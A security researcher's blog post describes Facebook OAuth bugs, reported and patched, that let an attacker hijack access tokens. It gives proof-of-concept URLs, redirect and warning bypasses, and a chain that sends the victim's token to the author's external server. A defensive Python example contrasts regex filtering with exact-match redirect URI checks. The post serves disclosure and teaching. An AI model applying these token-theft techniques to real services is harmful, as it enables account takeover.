Nir Goldshlager Web Application Security Blog<br />
How I Hacked Any Facebook Account...Again! (posted 2013-03-12)<div class="separator" style="clear: both; text-align: center;"></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyUgKVOOC5rZukjd3-6QxoQ5s6yl51bCj7K2oUUmkb7q8GmvnuD71D7t-zMJd80uG4mfvZ6oTl1iLJnnZzFjBEx3dkbimfvRXDE5Fsp0Vq4bWMjUvp7tVKGTluCDueEZ3XRGizdrSS5hs/s1600/HackThePlanet4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyUgKVOOC5rZukjd3-6QxoQ5s6yl51bCj7K2oUUmkb7q8GmvnuD71D7t-zMJd80uG4mfvZ6oTl1iLJnnZzFjBEx3dkbimfvRXDE5Fsp0Vq4bWMjUvp7tVKGTluCDueEZ3XRGizdrSS5hs/s400/HackThePlanet4.jpg" width="400" /></a></div><br />
<br />
This is my second post regarding Facebook OAuth vulnerabilities.<br />
<br />
<b>Just to clarify: there is no need for any installed apps on the victim's account. Even if the victim has never allowed any application on his Facebook account, I could still get full permissions on his account via the Facebook Messenger app_id (this bug works in any browser).</b><br />
<br />
<b>Also, it's important to mention that there is a special regex protection on the Facebook Messenger app_id (app_id=220764691281998),</b><br />
<br />
<b>and I was able to bypass it.</b><br />
<br />
<br />
<u><b>Bug 1:</b></u><br />
<br />
I reported this bug on 6/03/2013; the Facebook Security Team fixed it immediately.<br />
<br />
I also reported more OAuth bugs on 26/02/2013; the Facebook Security Team fixed them very quickly.<br />
<br />
The Facebook OAuth double URL encoding bug (Firefox) was reported on 6/02/2013 and also fixed very quickly.<br />
<br />
<u><b>Details:</b></u><br />
<br />
So, after my first OAuth vulnerability discovery (<a href="http://www.nirgoldshlager.com/2013/02/how-i-hacked-facebook-oauth-to-get-full.html" target="_blank">http://www.nirgoldshlager.com/2013/02/how-i-hacked-facebook-oauth-to-get-full.html</a>),<br />
<br />
Facebook Security was trying to protect against OAuth token hijacking attacks by using regex protection (%23xxx!, %23/xxx, /).<br />
<br />
Facebook rejected a single hash sign in the redirect_uri/next parameter (<b>next=%23/xxxx, next=%23xxx!</b>) to block OAuth attacks,<br />
<br />
<div dir="ltr">but Facebook allowed two or more hash signs in the redirect_uri/next parameter (next=<b>%23</b>/xxx/<b>%23</b>/xxx).<br />
<br />
That's because nobody thought there was a way to exploit Facebook OAuth with multiple hash signs in a request.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMjngYDl1GgLAQrRj4ClWku1CUzS2bGppz81ivbmaR93RyLaoK81Z3WMh9ecOAXcepsXXJHJzH98_V0miWa5gUkZ9AR1CnZujTXjLlYtZ_WjhNboRelskHWxqt65eeRhemYm_qxgLn3hI/s1600/strange-albert-einstein.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMjngYDl1GgLAQrRj4ClWku1CUzS2bGppz81ivbmaR93RyLaoK81Z3WMh9ecOAXcepsXXJHJzH98_V0miWa5gUkZ9AR1CnZujTXjLlYtZ_WjhNboRelskHWxqt65eeRhemYm_qxgLn3hI/s1600/strange-albert-einstein.JPG" /></a></div><br />
<br />
So, can we exploit OAuth with two hash signs (%23/x/%23/xxxx)?<br />
<br />
The answer is <b>yes</b>!<br />
<br />
I found that there is a strange redirection behavior when a user uses multiple hash signs in a facebook.com URL.<br />
<br />
<u><b>Multiple Hash Sign Request Example:</b></u><br />
<br />
<a href="http://facebook.com/#/x/%23/messages" target="_blank">facebook.com/#/x/#/messages</a><br />
<br />
redirects to:<br />
<br />
<a href="http://facebook.com/x/#/messages/" target="_blank">http://facebook.com/x/#/messages/</a><br />
<br />
and:<br />
<br />
<a href="http://facebook.com/x/#/messages/" target="_blank">http://facebook.com/x/#/messages/</a><br />
<br />
redirects to:<br />
<br />
<a href="http://facebook.com/messages/" target="_blank">http://facebook.com/messages/</a><br />
<br />
Amazing how things work ;)<br />
<br />
Now we know that we can use multiple hash signs (#/xxx/#/xxx)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnEdy9Rpv9KNRQ0jvORQl1OhUFRQOKsTLvoHczAT4B0tYnP2tpsXHp9Py-0FrjG2SLu2ZKJk7LBybpBHGf5EzC-3sJ7d4ChqrGyvNZEB7nWZbZYzcWAoE-C24V0JrnI5FSrrXpIG62BPo/s1600/multiplehashsignrequest.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnEdy9Rpv9KNRQ0jvORQl1OhUFRQOKsTLvoHczAT4B0tYnP2tpsXHp9Py-0FrjG2SLu2ZKJk7LBybpBHGf5EzC-3sJ7d4ChqrGyvNZEB7nWZbZYzcWAoE-C24V0JrnI5FSrrXpIG62BPo/s320/multiplehashsignrequest.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_cZTCJnRaoI0mQPR9kfks3c9hPX6Xh1kDvB__CwsBphPsKsIZ7eflyyv9FhA21sJMTgYk_ZyEoboQ4UdSNS1dpFVpJ1jL3s2zUDnglw6gK1jLoorge1uVy9-FRCDjFkCJ86t_CbwQrTU/s1600/multiplehashsignrequest.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div><br />
<br />
in our redirect_uri/next parameter to bypass the single hash sign (#/xx) regex protection in Facebook OAuth (next=http://facebook.com/#/xxx).<br />
<br />
There is more to it, though, in order to use that behavior to exploit the OAuth bug once again.</div><div dir="ltr">I found out that Facebook OAuth rejects unauthorized subdomains in the redirect_uri/next parameter.<br />
<br />
<u><b>For example:</b></u><br />
<br />
Facebook allows only the subdomains of the Facebook mobile version,<br />
<br />
Such as:<br />
<br />
<a href="http://touch.facebook.com/" target="_blank">touch.facebook.com</a><br />
<br />
<a href="http://m.facebook.com/" target="_blank">m.facebook.com</a><br />
<br />
<a href="http://0.facebook.com/" target="_blank">0.facebook.com</a><br />
<br />
<br />
But it rejects unknown subdomains<br />
<br />
(<a href="http://aaa.facebook.com/" target="_blank">aaa.facebook.com</a>, <a href="http://bbb.facebook.com/" target="_blank">bbb.facebook.com</a>) and the main domains (<a href="http://facebook.com/" target="_blank">facebook.com</a>, <a href="http://apps.facebook.com/" target="_blank">apps.facebook.com</a>, etc.).<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgznd_UHnrYc9b2zAArK0pWnVcvTtfErmTf4IBhT03uz3C_JTHH4A5pApgpEr5gwbPC5b3NiyWiP9jPvXtbEWV2OPsJTEeRDCDzGbYB-eGaGLSzL7VrTYlE8TZndAJ_wU9EbjkxjCHUfe4/s1600/rejectedomain.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgznd_UHnrYc9b2zAArK0pWnVcvTtfErmTf4IBhT03uz3C_JTHH4A5pApgpEr5gwbPC5b3NiyWiP9jPvXtbEWV2OPsJTEeRDCDzGbYB-eGaGLSzL7VrTYlE8TZndAJ_wU9EbjkxjCHUfe4/s320/rejectedomain.jpg" width="320" /></a></div></div><div dir="ltr"><br />
<b>Again, bad news!</b></div><div dir="ltr">That's because in any mobile version of Facebook (<a href="http://touch.facebook.com/" target="_blank">touch.facebook.com</a>, <a href="http://m.facebook.com/" target="_blank">m.facebook.com</a>, <a href="http://0.facebook.com/" target="_blank">0.facebook.com</a>), <b>we won't see the multiple hash sign behaviour in our request</b>.<br />
<br />
<u><b>For Example:</b></u><br />
<br />
<a href="https://touch.facebook.com/#%21/xx/%23%21/messages" target="_blank">https://touch.facebook.com/#/xx/#!messages</a><br />
<br />
<a href="https://touch.facebook.com/#%21/xx/%23%21/messages" target="_blank">https://touch.facebook.com/#!/xx/#!/messages</a><br />
<br />
This request will not be valid and will not redirect us to the messages screen.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYnBvV4fmcXM_p1Nkp-iU8Xdohxg6TVpMTDNy4S85B4CyzwTfNkcDPdURhBgHW6h4p4X5U7tfY-h9JNnkjRwtPcyi4zCLpJmku7tctK2qg1X4JKBM5B0w-6CImo4j0dr9rjK9vqooSa0c/s1600/51514_houston-we-have-a-problem.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYnBvV4fmcXM_p1Nkp-iU8Xdohxg6TVpMTDNy4S85B4CyzwTfNkcDPdURhBgHW6h4p4X5U7tfY-h9JNnkjRwtPcyi4zCLpJmku7tctK2qg1X4JKBM5B0w-6CImo4j0dr9rjK9vqooSa0c/s320/51514_houston-we-have-a-problem.jpg" width="320" /></a></div><br />
<br />
Anyway, I need a subdomain that behaves the same as the official facebook.com domain.<br />
<br />
I need it to exploit the strange redirection behavior with multiple hash signs (#/xx/#/xx) under facebook.com.</div><div dir="ltr">At first sight it seems that Facebook rejects any subdomain except the mobile subdomains (touch.facebook.com, etc.),<br />
<br />
but I found that if I use <b>facebook as a subdomain (facebook.facebook.com)</b>, I can bypass this protection.<br />
<br />
<b><span style="font-size: large;">Sometimes the answer is right in front of you :)</span></b></div><div dir="ltr"><br />
</div><div dir="ltr"><b>Wait a second!</b><br />
<br />
For now it seems that I can access files / directories on <a href="http://facebook.com/" target="_blank">facebook.com</a> via the redirect_uri/next parameter, right?</div><div dir="ltr">But I can't reach my app, which redirects victims to the attacker's external website (files.nirgoldshlager.com) to save the victim's access_token.<br />
That's because my "malicious" app is located at <a href="http://touch.facebook.com/apps/xxx" target="_blank">touch.facebook.com/apps/xxx</a>, <a href="http://apps.facebook.com/apps/xxxx" target="_blank">apps.facebook.com/apps/xxxx</a><br />
<br />
</div><div dir="ltr">I thought of a few ways to exploit this situation:<br />
<br />
<b>1.</b><br />
<br />
Create a page tab in a Facebook Page that redirects to an external website (<a href="http://files.nirgoldshlager.com/" target="_blank">files.nirgoldshlager.com</a>),<br />
<br />
<b>2.</b><br />
<br />
Try to access my app from the <a href="http://facebook.com/" target="_blank">facebook.com</a> domain,<br />
<br />
<br />
<b>3.</b><br />
<br />
Find a site redirection vulnerability in <a href="http://facebook.com/" target="_blank">facebook.com</a>.<br />
<br />
<br />
I tried to use my app or page tab in the redirect_uri/next parameter.</div><div dir="ltr"><b>For example:</b><br />
<br />
<b>A.</b><br />
<br />
(My "malicious" app, located on facebook.com)<br />
<br />
<a href="https://facebook.com/apps/application.php?id=314021278671363" target="_blank">https://facebook.com/apps/application.php?id=314021278671363</a></div><div dir="ltr"><b>B.</b><br />
<br />
(Page tab that redirects to an external website, located on facebook.com)<br />
<br />
<a href="https://www.facebook.com/Goldshlager?v=app_185356844859770" target="_blank">https://www.facebook.com/Goldshlager?v=app_185356844859770</a><br />
<br />
<b>Bad news again!</b><br />
<br />
I can't use these methods because there are too many redirects in this attack.<br />
<br />
The victim's access_token will not be sent to an external site after 3 redirects in the GET URL. That sucks!<br />
<br />
I was thinking again: maybe there is some way to redirect the victim directly to my app located at <a href="http://touch.facebook.com/apps/myapp" target="_blank">touch.facebook.com/apps/myapp</a>, to limit the redirection chain to three hops, for example.<br />
<br />
So, I found that there is a file called l.php on <a href="http://facebook.com/" target="_blank">facebook.com</a>; I'm sure most of you are familiar with this file.<br />
<br />
This file is responsible for redirecting people to external websites. In this case Facebook shows a warning message asking the user to confirm the redirection before redirecting him.<br />
<br />
Seems I'm lost again.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsSoQiYGyZNelQq-HRHwIaRmLkO8NjSbZsW1t83gB4RN28CwZ8mlUTeE7SkL_RUycBblpglYuZO_nujUaa0RZkGlN0YCEn8MgCZG4UXiMZuMtTKeYA5RcQttn8CDajogUeZDf1T2wxCm4/s1600/warnning.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsSoQiYGyZNelQq-HRHwIaRmLkO8NjSbZsW1t83gB4RN28CwZ8mlUTeE7SkL_RUycBblpglYuZO_nujUaa0RZkGlN0YCEn8MgCZG4UXiMZuMtTKeYA5RcQttn8CDajogUeZDf1T2wxCm4/s320/warnning.jpg" width="320" /></a></div><br />
<br />
I found that if I put 5 bytes before the external website in l.php,<br />
<br />
I can bypass this warning message when I redirect the victim to subdomains of <a href="http://facebook.com/" target="_blank">facebook.com</a>.<br />
<br />
<u><b>For example:</b></u><br />
<br />
<b>Warning message:</b><br />
<br />
<a href="https://www.facebook.com/l/;touch.facebook.com/apps/sdfsdsdsgs" target="_blank">https://www.facebook.com/l/;touch.facebook.com/apps/sdfsdsdsgs</a><br />
<br />
<b>Bypassing the warning message by using 5 bytes</b>, redirecting to the touch.facebook.com subdomain:<br />
<br />
<a href="https://www.facebook.com/l/ggggg;touch.facebook.com/apps/sdfsdsdsgs" target="_blank">https://www.facebook.com/l/ggggg;touch.facebook.com/apps/sdfsdsdsgs</a><br />
<br />
Cool!<br />
<br />
Now let's combine all of these methods to bypass Facebook OAuth.<br />
<br />
<u><b>Exploit Summary</b></u><br />
<br />
<b>1.</b><br />
<br />
Use the <a href="http://facebook.facebook.com/" target="_blank">facebook.facebook.com</a> subdomain to bypass the subdomain regex protection in OAuth.<br />
<br />
<b>2.</b><br />
<br />
Exploit the strange redirection behavior on <a href="http://facebook.com/" target="_blank">facebook.com</a> with multiple hash signs (<a href="https://facebook.facebook.com/#/x/%23/l/ggggg;touch.facebook.com/apps/sdfsdsdsgs" target="_blank">https://facebook.facebook.com/#/x/#/l/ggggg;touch.facebook.com/apps/sdfsdsdsgs</a>).<br />
<br />
<b>3.</b><br />
<br />
Bypass the warning message in l.php with 5 bytes (<a href="https://www.facebook.com/l/ggggg;touch.facebook.com" target="_blank">https://www.facebook.com/l/ggggg;touch.facebook.com</a>).<br />
<br />
<b>4.</b><br />
<br />
Redirect the victim to an external website at <a href="http://files.nirgoldshlager.com/" target="_blank">files.nirgoldshlager.com</a> via my Facebook app, to save the victim's access_token in a log file.<br />
<br />
<u><b>Final PoC, one click (works on all browsers, bypasses 2-step verification, access token never expires until the victim changes his password):</b></u><br />
<br />
<a href="https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https://facebook.facebook.com/%23/x/%23/l/ggggg%3btouch.facebook.com/apps/sdfsdsdsgs%23&display=page&fbconnect=1&method=permissions.request&response_type=token" target="_blank">https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https://facebook.facebook.com/%23/x/%23/l/ggggg%3btouch.facebook.com/apps/sdfsdsdsgs%23&display=page&fbconnect=1&method=permissions.request&response_type=token</a><br />
<br />
<br />
<u><b><span style="font-family: arial,sans-serif; font-size: 13px;">Full list of permissions granted by the Facebook Messenger access token:</span></b></u><br />
<br />
<span style="font-family: arial,sans-serif; font-size: 13px;">ads_management create_event create_note email export_stream manage_friendlists manage_groups manage_notifications manage_pages offline_access photo_upload publish_actions publish_checkins publish_stream read_friendlists read_insights read_mailbox read_page_mailboxes read_requests read_stream rsvp_event share_item sms status_update video_upload xmpp_login</span><br />
<br />
<br />
And???<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAjmGjaxdrehp2zY9YrLufDVsZ8jdfR0kSVx4LYiJCcFcKh5eRZV0BkWW_nBwAo-Kw__Ia8F6tz_Bx4upM28S8F32kEFTaXcCpZCFhyphenhyphen4nEByhouRYQb-SgEKBCmgXHL5WJf_ctesVKPhw/s1600/gameover.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAjmGjaxdrehp2zY9YrLufDVsZ8jdfR0kSVx4LYiJCcFcKh5eRZV0BkWW_nBwAo-Kw__Ia8F6tz_Bx4upM28S8F32kEFTaXcCpZCFhyphenhyphen4nEByhouRYQb-SgEKBCmgXHL5WJf_ctesVKPhw/s400/gameover.jpg" width="400" /></a></div><br />
<br />
</div><div dir="ltr"><u><b>Bug 2:</b></u><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiheH51Zu6rb6RbC1H2antntqJYcgTS47lKAzp79R-MwTjdg0sOoBejWsdLLDUGhucAizjrieGkSTOfA8-idiD5LWf25DtfZUS5c7i7J61wdMj6LsvdleOoPBkpdAkB6uRoX1gpU6jIySo/s1600/firefox1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiheH51Zu6rb6RbC1H2antntqJYcgTS47lKAzp79R-MwTjdg0sOoBejWsdLLDUGhucAizjrieGkSTOfA8-idiD5LWf25DtfZUS5c7i7J61wdMj6LsvdleOoPBkpdAkB6uRoX1gpU6jIySo/s320/firefox1.jpg" width="226" /></a></div><br />
<br />
This bug was fixed a few weeks ago.<br />
<br />
I wanted to find something unique for Facebook users who use the Firefox browser!<br />
<br />
I found that an attacker is able to encode his payload with double URL encoding (%25xx) to attack Facebook users on Firefox and bypass the Facebook OAuth regex protection.<br />
<br />
This behavior bypasses the hash sign regex protection on <a href="http://touch.facebook.com/" target="_blank">touch.facebook.com</a>, <a href="http://facebook.com/" target="_blank">facebook.com</a>, <a href="http://x.facebook.com/" target="_blank">x.facebook.com</a>, etc.<br />
<br />
<b>PoC:</b><br />
<br />
<a href="https://www.facebook.com/dialog/permissions.request?app_id=220764691281998&display=page&next=https%3A%2F%2Ftouch.facebook.com%2F%2523%2521%2Fapps%2Ftestestestte%2F&response_type=token&perms=email&fbconnect=1" target="_blank">https://www.facebook.com/dialog/permissions.request?app_id=220764691281998&display=page&next=https%3A%2F%2Ftouch.facebook.com%2F%2523%2521%2Fapps%2Ftestestestte%2F&response_type=token&perms=email&fbconnect=1</a></div><div dir="ltr"><br />
<br />
BTW,<br />
<br />
if you want to use OAuth 2.0 on your own website, have a look at Egor Homakov's (<a href="https://twitter.com/homakov" target="_blank">@homakov</a>) post (<a href="http://homakov.blogspot.co.il/2013/03/redirecturi-is-achilles-heel-of-oauth.html" target="_blank">http://homakov.blogspot.co.il/2013/03/redirecturi-is-achilles-heel-of-oauth.html</a>), which shows how to fix these vulnerabilities in OAuth 2.0.<br />
<br />
Also, please read the risks regarding OAuth 2.0 before you use it on your own site:<br />
<br />
<a href="http://tools.ietf.org/html/rfc6749#page-60" target="_blank">http://tools.ietf.org/html/rfc6749#page-60</a><br />
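<br />
As an added example (my own code for this edit, not Facebook's and not from the post), here is the defensive side of what the two bugs above show: a redirect-target check written as a regex plus a host-suffix test, of the kind the post defeated, next to the exact-match comparison RFC 6749 section 3.1.2.3 requires for a registered redirection URI. Both are run over the values from the post's own PoC links (the multi-hash facebook.facebook.com URL from Bug 1 and the double-encoded %2523%2521 path from Bug 2). The registered callback URIs, the app-to-URI table and the exact shape of the weak filter are assumptions made for this example; the app_id and hostnames are the post's.<br />
<br />
```python
"""Redirect-target validation for an OAuth 2.0 authorization server.

Added example: this is not Facebook's code and not part of the original post.
It puts a pattern-based filter of the kind the post defeated next to the
exact-match comparison RFC 6749 section 3.1.2.3 requires, and runs both over
the values from the post's PoC links. The registered callback URIs are
constructed for the example; the app_id and hostnames come from the post.
"""
import re
from urllib.parse import urlsplit

# Constructed registration table: app_id -> exact redirect URIs the app owner
# registered. 220764691281998 is the Messenger app_id quoted in the post; the
# callback paths are assumptions made for this example.
REGISTERED_REDIRECTS = {
    "220764691281998": {
        "https://touch.facebook.com/messenger/callback",
        "https://m.facebook.com/messenger/callback",
    },
}

# Simplified stand-in for the protection the post describes: reject a single
# "#/..." or "#...!" fragment, accept any host under facebook.com. Both checks
# see the value exactly as the web framework delivered it after one round of
# query-string decoding, which is what lets the double-encoded case slip by.
ONE_HASH_FRAGMENT = re.compile(r"^[^#]*#(?:/|[^#/!]*!)[^#]*$")


def pattern_filter_allows(next_url):
    """Regex/suffix filter. Returns True when the value would be accepted."""
    if ONE_HASH_FRAGMENT.match(next_url):
        return False  # the one-hash case the post says was blocked
    host = urlsplit(next_url).hostname or ""
    return host.endswith(".facebook.com")


def redirect_uri_registration_error(uri):
    """Registration-time rules (RFC 6749 section 3.1.2): absolute https URI,
    no fragment, and no percent-encoded bytes so the stored form is canonical.
    Returns an error string, or None when the URI may be registered."""
    parts = urlsplit(uri)
    if parts.scheme != "https" or not parts.netloc:
        return "redirect URI must be an absolute https URI"
    if "#" in uri:
        return "redirect URI must not contain a fragment"
    if "%" in uri:
        return "redirect URI must not contain percent-encoded bytes"
    return None


def register_redirect_uri(app_id, uri, table=REGISTERED_REDIRECTS):
    """Store a redirect URI for app_id after the registration-time checks."""
    error = redirect_uri_registration_error(uri)
    if error:
        raise ValueError(error)
    table.setdefault(app_id, set()).add(uri)


def exact_match_allows(app_id, next_url, table=REGISTERED_REDIRECTS):
    """Simple string comparison (RFC 6749 section 3.1.2.3, RFC 3986 section
    6.2.1): the submitted value must equal a registered URI byte for byte.
    No regex, no host-suffix test, no decoding, so an extra '#', a look-alike
    subdomain, or a double-encoded path is rejected without a pattern that
    has to anticipate it."""
    return next_url in table.get(app_id, set())


APP_ID = "220764691281998"

# Values as the server sees them after one round of query-string decoding.
PAYLOADS = {
    # a registered callback
    "registered": "https://touch.facebook.com/messenger/callback",
    # single hash sign: the case the post says the regex blocked
    "one_hash": "https://touch.facebook.com/#/messages",
    # Bug 1 PoC: look-alike subdomain, two hash signs, l.php hop
    "multi_hash": "https://facebook.facebook.com/#/x/#/l/ggggg;touch.facebook.com/apps/sdfsdsdsgs#",
    # Bug 2 PoC: %2523%2521 arrives as a literal %23%21, so no '#' is visible
    "double_encoded": "https://touch.facebook.com/%23%21/apps/testestestte/",
}


def evaluate(app_id=APP_ID, payloads=PAYLOADS):
    """Map each payload name to (pattern_filter_result, exact_match_result)."""
    return {
        name: (pattern_filter_allows(url), exact_match_allows(app_id, url))
        for name, url in payloads.items()
    }


if __name__ == "__main__":
    for name, (weak, strict) in evaluate().items():
        print(f"{name:15} pattern filter: {'allow' if weak else 'block':5}  "
              f"exact match: {'allow' if strict else 'block'}")
```
<br />
Running the module prints one line per payload: the weak filter lets both PoC values through and blocks only the single-hash case, while exact matching accepts nothing but the registered callback. The point is not the particular regex. Any check that has to enumerate bad shapes (one hash, unknown subdomain, encoded bytes) is always one variation behind, whereas a byte-for-byte comparison against what the app owner registered has no shape to anticipate; the constraints that matter (https, no fragment, canonical encoding) are enforced once, at registration time.<br />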
<br />
<br />
See you next time :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div></div></div>
How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account (Without App "Allow" Interaction) (posted 2013-02-21)<div style="direction: ltr;">Hi,</div><div style="direction: ltr;"><br />
I decided to share one of my favorite flaws I discovered in <a href="http://facebook.com/" target="_blank">facebook.com</a>.</div><div style="direction: ltr;">This flaw allowed me to take full control over any Facebook account.<br />
<br />
By exploiting this flaw I could steal unique access tokens that gave me full control over any Facebook account.</div><div dir="ltr"><b>Just to clarify: there is no need for any installed apps on the victim's account. Even if the victim never allowed any application on his Facebook account, I could still get full permissions (this bug works in any browser).</b></div><div style="direction: ltr;"><br />
To make this exploit work, the victim only needs to visit a webpage.<br />
OAuth is used by Facebook to communicate between applications and Facebook users. Usually users must allow/accept the application's request to access their account before the communication can start.</div><div style="direction: ltr;"><br />
Any Facebook application might ask for different permissions.</div><div style="direction: ltr;"><br /> <u><b>For example:</b></u></div><div style="direction: ltr;"><br />
Diamond Dash and Texas Holdem Poker only have permission to basic information and to post on the user's wall.<br />
<br />
</div><div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVyLlLLJle39sszaatFP_DK1riutvR5KcuVHkrnFWEAvLy9h5NpF8ztWb_U_qEN6cBsuIObdUo8tfz4BrRZPLOD2bw7MBm6ccaxduvJmHHD0J0IODh1i3Mb-BI0QYUrqxZDmVxAXHUnhQ/s1600/nadia+oauth+diamond+dash.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVyLlLLJle39sszaatFP_DK1riutvR5KcuVHkrnFWEAvLy9h5NpF8ztWb_U_qEN6cBsuIObdUo8tfz4BrRZPLOD2bw7MBm6ccaxduvJmHHD0J0IODh1i3Mb-BI0QYUrqxZDmVxAXHUnhQ/s320/nadia+oauth+diamond+dash.jpg" width="320" /></a></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<br />
I found a way to get full permissions (read inbox, outbox, manage pages, manage ads, read private photos, videos, etc.) over the victim's account even without any installed apps on the victim's account.</div><div style="direction: ltr;">Another advantage of the flaw I found is that the token has no expiry date like it would with any other application; in my attack the token never expires unless the victim changes his password :)<br />
</div><div style="direction: ltr;">So, the URL of the OAuth dialog looks like this:<br />
<br /> <a href="https://www.facebook.com/dialog/oauth/?app_id=YOUR_APP_ID&next=YOUR_REDIRECT_URL&state=YOUR_STATE_VALUE&scope=COMMA_SEPARATED_LIST_OF_PERMISSION_NAMES" target="_blank">https://www.facebook.com/dialog/oauth/?app_id=YOUR_APP_ID&next=YOUR_REDIRECT_URL&state=YOUR_STATE_VALUE&scope=COMMA_SEPARATED_LIST_OF_PERMISSION_NAMES</a></div><div style="direction: ltr;"><br /> Every application on Facebook has a different app_id; for example, 'Diamond Dash' would be app_id=2 and 'Texas Holdem Poker' would be app_id=3.<br />
<br /> The next/redirect_uri parameter (next=, redirect_uri=) only accepts the owner app's domain.</div><div style="direction: ltr;">For example, app_id=2389801228 belongs to the 'Texas Holdem Poker' app, so the 'next' parameter will allow only the <a href="http://zynga.com/" target="_blank">zynga.com</a> domain (i.e. next=<a href="http://zynga.com/" target="_blank">http://zynga.com</a>).</div><div style="direction: ltr;">If the domain in the 'next'/'redirect_uri' parameter is different (<a href="http://nirgoldshlager.com/" target="_blank">nirgoldshlager.com</a>), Facebook will block this action.<br />
<br />
<br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBO3UBTUtDX6bo0qsKBxaOX-74-6Kx8J4ZbRHPhX7yy45hawCtS-kauhK_IAA0k-gTIiSttvQFzYn3DLogxmTR-9KAEKqB6Mz4oCx7oQh8kPRKHRzNzNQXctyrxdXHkxCoQFDbtz0sbU/s1600/facebookblockzynga.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBO3UBTUtDX6bo0qsKBxaOX-74-6Kx8J4ZbRHPhX7yy45hawCtS-kauhK_IAA0k-gTIiSttvQFzYn3DLogxmTR-9KAEKqB6Mz4oCx7oQh8kPRKHRzNzNQXctyrxdXHkxCoQFDbtz0sbU/s320/facebookblockzynga.jpg" width="320" /></a></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<br />
Facebook performs a match between your app_id and your next parameter. Facebook also sends the access token via a GET request to the owner application after the user has allowed it.</div><div style="direction: ltr;">Now that we know how Facebook OAuth works, let's talk about my finding.</div><div style="direction: ltr;">I started to think of my options: what if I could redirect the application's OAuth request to a different 'next' URL? First I tried to change the 'next' parameter to a different domain and they blocked my action.</div><div style="direction: ltr;">Then I tried to change the next parameter to the <a href="http://facebook.com/" target="_blank">facebook.com</a> domain, and got blocked again with a general error message.<br />
<br />
<br />
</div><div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQKREAT99Z5fRZHWiJdkcSZsuyJlnSDNIADBJYGKZw6ny8yCEd4y28-ELc79UtS5f6vCPNFEEf9iN3d5hKvVU8tT5EycHyaCBbuPF9vWa0Mg3rJ2e5jorkl8plZ7_rrrNas99co0n52Ug/s1600/facebookdotcomdomainblockgeneralerror.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQKREAT99Z5fRZHWiJdkcSZsuyJlnSDNIADBJYGKZw6ny8yCEd4y28-ELc79UtS5f6vCPNFEEf9iN3d5hKvVU8tT5EycHyaCBbuPF9vWa0Mg3rJ2e5jorkl8plZ7_rrrNas99co0n52Ug/s320/facebookdotcomdomainblockgeneralerror.jpg" width="320" /></a></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<br />
